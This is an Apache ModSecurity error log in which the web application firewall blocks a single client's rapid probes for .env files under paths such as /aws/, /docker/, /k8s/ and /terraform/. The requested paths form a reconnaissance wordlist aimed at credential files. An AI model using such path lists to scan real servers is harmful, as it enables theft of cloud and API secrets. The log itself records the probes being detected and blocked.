[Mon May 11 18:07:36.254969 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/brevo/.env"] [unique_id "agH-yA-Qm4vhlWBPlMjeWQAAAAo"]
[Mon May 11 18:07:36.255225 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/brevo/.env"] [unique_id "agH-yA-Qm4vhlWBPlMjeWQAAAAo"]
[Mon May 11 18:07:36.261259 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yA-Qm4vhlWBPlMjeWQAAAAo"]
[Mon May 11 18:07:36.507708 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/transactional/.env"] [unique_id "agH-yA-Qm4vhlWBPlMjeWgAAAAo"]
[Mon May 11 18:07:36.507964 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/transactional/.env"] [unique_id "agH-yA-Qm4vhlWBPlMjeWgAAAAo"]
[Mon May 11 18:07:36.508298 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yA-Qm4vhlWBPlMjeWgAAAAo"]
[Mon May 11 18:07:37.122424 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bulk/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeWwAAAAo"]
[Mon May 11 18:07:37.122665 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bulk/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeWwAAAAo"]
[Mon May 11 18:07:37.122957 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yQ-Qm4vhlWBPlMjeWwAAAAo"]
[Mon May 11 18:07:37.230701 2026] [authz_core:error] [pid 1412074:tid 1412083] [client 216.73.216.110:13654] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/cas/error_log
[Mon May 11 18:07:37.376169 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/aws/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXAAAAAo"]
[Mon May 11 18:07:37.376405 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/aws/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXAAAAAo"]
[Mon May 11 18:07:37.376711 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXAAAAAo"]
[Mon May 11 18:07:37.642173 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/azure/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXQAAAAo"]
[Mon May 11 18:07:37.642402 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/azure/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXQAAAAo"]
[Mon May 11 18:07:37.642718 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXQAAAAo"]
[Mon May 11 18:07:37.932839 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gcp/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXwAAAAo"]
[Mon May 11 18:07:37.933071 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gcp/.env"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXwAAAAo"]
[Mon May 11 18:07:37.933466 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yQ-Qm4vhlWBPlMjeXwAAAAo"]
[Mon May 11 18:07:38.361061 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cloud/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeYAAAAAo"]
[Mon May 11 18:07:38.361340 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cloud/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeYAAAAAo"]
[Mon May 11 18:07:38.361683 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yg-Qm4vhlWBPlMjeYAAAAAo"]
[Mon May 11 18:07:38.699541 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/infrastructure/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeYwAAAAo"]
[Mon May 11 18:07:38.699787 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/infrastructure/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeYwAAAAo"]
[Mon May 11 18:07:38.700103 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yg-Qm4vhlWBPlMjeYwAAAAo"]
[Mon May 11 18:07:38.965779 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeZAAAAAo"]
[Mon May 11 18:07:38.966013 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agH-yg-Qm4vhlWBPlMjeZAAAAAo"]
[Mon May 11 18:07:38.966345 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yg-Qm4vhlWBPlMjeZAAAAAo"]
[Mon May 11 18:07:39.369830 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/k8s/.env"] [unique_id "agH-yw-Qm4vhlWBPlMjeZgAAAAo"]
[Mon May 11 18:07:39.370116 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/k8s/.env"] [unique_id "agH-yw-Qm4vhlWBPlMjeZgAAAAo"]
[Mon May 11 18:07:39.370424 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yw-Qm4vhlWBPlMjeZgAAAAo"]
[Mon May 11 18:07:39.905729 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/kubernetes/.env"] [unique_id "agH-yw-Qm4vhlWBPlMjeaAAAAAo"]
[Mon May 11 18:07:39.905960 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/kubernetes/.env"] [unique_id "agH-yw-Qm4vhlWBPlMjeaAAAAAo"]
[Mon May 11 18:07:39.906290 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-yw-Qm4vhlWBPlMjeaAAAAAo"]
[Mon May 11 18:07:40.475989 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/terraform/.env"] [unique_id "agH-zA-Qm4vhlWBPlMjeaQAAAAo"]
[Mon May 11 18:07:40.476305 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/terraform/.env"] [unique_id "agH-zA-Qm4vhlWBPlMjeaQAAAAo"]
[Mon May 11 18:07:40.476657 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zA-Qm4vhlWBPlMjeaQAAAAo"]
[Mon May 11 18:07:40.888586 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ansible/.env"] [unique_id "agH-zA-Qm4vhlWBPlMjeawAAAAo"]
[Mon May 11 18:07:40.888850 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ansible/.env"] [unique_id "agH-zA-Qm4vhlWBPlMjeawAAAAo"]
[Mon May 11 18:07:40.923395 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zA-Qm4vhlWBPlMjeawAAAAo"]
